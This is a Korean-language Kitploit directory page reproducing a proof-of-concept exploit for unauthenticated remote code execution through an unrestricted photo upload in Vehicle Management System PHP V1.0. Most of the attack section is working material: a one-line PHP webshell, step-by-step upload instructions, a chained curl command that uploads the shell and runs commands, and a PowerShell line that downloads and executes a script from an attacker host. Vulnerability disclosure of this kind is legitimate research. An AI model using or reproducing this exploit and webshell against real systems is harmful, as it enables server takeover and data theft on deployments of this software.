Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-11344-RCE — Vehicle Management System PHP V1.0에서 무제한 파일 업로드를 통한 인증되지 않은 원격 코드 실행 인증 개념 증명 익스플로잇. 상세한 재현 단계, curl PoC 및 PHP 웹셸 페이로드 포함. | Kitploit
도구/GitHubGitHub/xmyronn/cve-2026-11344-rce
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubxmyronn/cve-2026-11344-rce

CVE-2026-11344-RCE

Vehicle Management System PHP V1.0에서 무제한 파일 업로드를 통한 인증되지 않은 원격 코드 실행 인증 개념 증명 익스플로잇. 상세한 재현 단계, curl PoC 및 PHP 웹셸 페이로드 포함.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PHP 기반 차량 관리 시스템 - newdriver.php 파일 업로드를 통한 인증되지 않은 원격 코드 실행

취약점 정보

필드세부 정보
제품PHP 기반 차량 관리 시스템
공급업체code-projects.org
버전V1.0
취약점 유형무제한 파일 업로드로 인한 원격 코드 실행 (CWE-434)
영향받는 파일newdriver.php, newvehicle.php
매개변수photo (POST, multipart/form-data)
인증 필요아니요 (인증되지 않음)
CVSS 점수10.0 Critical
공격 경로원격 / 네트워크
필요 권한없음
사용자 상호작용없음

취약점 설명

PHP 기반 차량 관리 시스템 V1.0( code-projects.org 제공)은 newdriver.php(및 동일하게 newvehicle.php)의 무제한 파일 업로드를 통해 인증되지 않은 원격 코드 실행에 취약합니다.

이 애플리케이션은 관리자 전용 '새 운전자' 등록 양식을 newdriver.php에 노출하며, 여기에는 사진 업로드 필드가 포함됩니다. 그러나 이 엔드포인트는 세션 검증을 수행하지 않습니다 — 인증되지 않은 공격자는 로그인 페이지로 리디렉션되지 않고 직접 접근할 수 있습니다. 또한 사진 업로드 필드는 PHP 파일을 포함한 모든 파일 형식을 허용하며, 확장자 필터링, MIME 타입 검증, 내용 검사가 없습니다.

공격자는 다음을 수행할 수 있습니다:

  1. 세션이나 자격 증명 없이 newdriver.php를 직접 방문
  2. PHP 웹쉘을 '사진'으로 제출
  3. 쉘이 /picture/ 디렉토리에 저장됨
  4. 업로드된 쉘에 접근하여 서버에서 임의의 OS 명령 실행

이로 인해 웹 서버 프로세스의 권한으로 완전한 원격 코드 실행이 발생합니다.


취약점 체인

root@kitploit:~
인증되지 않은 HTTP 요청
        ↓
newdriver.php (세션 검사 없음)
        ↓
photo 필드가 .php 파일 허용 (파일 형식 검증 없음)
        ↓
쉘이 /picture/web_shell.php에 저장됨
        ↓
GET /picture/web_shell.php?cmd=whoami
        ↓
RCE — 임의의 OS 명령 실행

재현 단계

1단계 — newdriver.php에 대한 인증되지 않은 접근 확인

세션이 없는 새 브라우저(시크릿/개인 창)를 엽니다. 엔드포인트로 직접 이동합니다:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php

새 운전자 양식이 인증 검사 없이 성공적으로 로드되며, 로그인으로 리디렉션되지 않습니다.

스크린샷 2026-05-19 175610

2단계 — PHP 웹쉘 준비

간단한 PHP 명령 실행 웹쉘을 생성합니다:

root@kitploit:~
<?php system($_GET['cmd']); ?>

shell.php(또는 임의의 .php 파일명)로 저장합니다.


3단계 — 웹쉘을 사진으로 사용하여 양식 제출

운전자 양식 필드를 임의의 값으로 채우고 PHP 웹쉘을 사진 업로드로 선택합니다:

root@kitploit:~
운전자 이름:        test
휴대폰:             1234567890
운전자 입사일:       2026-05-19
국가 ID:        test
면허 번호:         test
면허 만료일:   2026-05-30
운전자 주소:     test
사진:              shell.php   ← PHP 웹쉘이 여기에 업로드됨

제출을 클릭합니다.

스크린샷 2026-05-19 175622 스크린샷 2026-05-19 175708

4단계 — 쉘 업로드 확인

애플리케이션이 "Registration Completed!" 로 응답합니다 — PHP 쉘이 검증 없이 수락되고 저장되었음을 확인합니다.

스크린샷 2026-05-19 175718

5단계 — 업로드된 쉘을 통해 임의 명령 실행

/picture/ 디렉토리에 업로드된 쉘로 이동하여 cmd 매개변수를 통해 OS 명령을 전달합니다:

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami

서버가 명령을 실행하고 출력을 반환합니다:

root@kitploit:~
desktop-g1i9np3\dell
스크린샷 2026-05-19 175759

6단계 — 추가 명령 실행 예제

root@kitploit:~
# 민감한 파일 읽기
http://TARGET/.../picture/shell.php?cmd=type+C:\xampp\htdocs\VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\newdriver.php

# 웹 루트 목록
http://TARGET/.../picture/shell.php?cmd=dir+C:\xampp\htdocs\

# PowerShell을 통한 전체 리버스 쉘
http://TARGET/.../picture/shell.php?cmd=powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

두 번째 영향받는 엔드포인트 — newvehicle.php

newvehicle.php에도 동일한 취약점이 존재합니다. 인증되지 않은 공격자는 새 차량 추가 양식에 접근하여 차량 사진 필드를 통해 PHP 웹쉘을 업로드하고 동일한 방법으로 RCE를 달성할 수 있습니다.

root@kitploit:~
http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newvehicle.php

두 엔드포인트 모두 동일한 근본 원인을 공유합니다: 세션 검증 없음 및 파일 업로드 제한 없음.


curl PoC (한 줄)

root@kitploit:~
curl -s -X POST \
  "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php" \
  -F "dname=test" \
  -F "mobile=1234567890" \
  -F "djoiningdate=2026-05-19" \
  -F "nid=test" \
  -F "licenseno=test" \
  -F "licenseenddate=2026-05-30" \
  -F "daddress=test" \
  -F "[email protected];type=image/jpeg" \
  && echo "[+] Shell uploaded" \
  && curl -s "http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami"

영향

  • 인증되지 않은 원격 코드 실행 — 네트워크 상의 익명 공격자가 전체 OS 명령 실행을 달성
  • 완전한 서버 장악 — 모든 파일, 자격 증명, 데이터베이스 설정에 대한 읽기/쓰기 접근
  • 상호작용 불필요 — 단일 HTTP 요청으로 완전 자동화된 익스플로잇
  • 두 개의 영향받는 엔드포인트 — newdriver.php 및 newvehicle.php 모두 취약

영향받는 파일

파일업로드 필드쉘 저장 경로
newdriver.phpphoto/picture/
newvehicle.phpphoto/picture/

공급업체 정보

  • 공급업체 홈페이지: https://code-projects.org/vehicle-management-system-in-php-with-source-code/
  • 다운로드: https://code-projects.org/vehicle-management-system-in-php-with-source-code/

발견자

Syed Imad Uddin Alvi (imad alvi)
독립 보안 연구원

도구 다운로드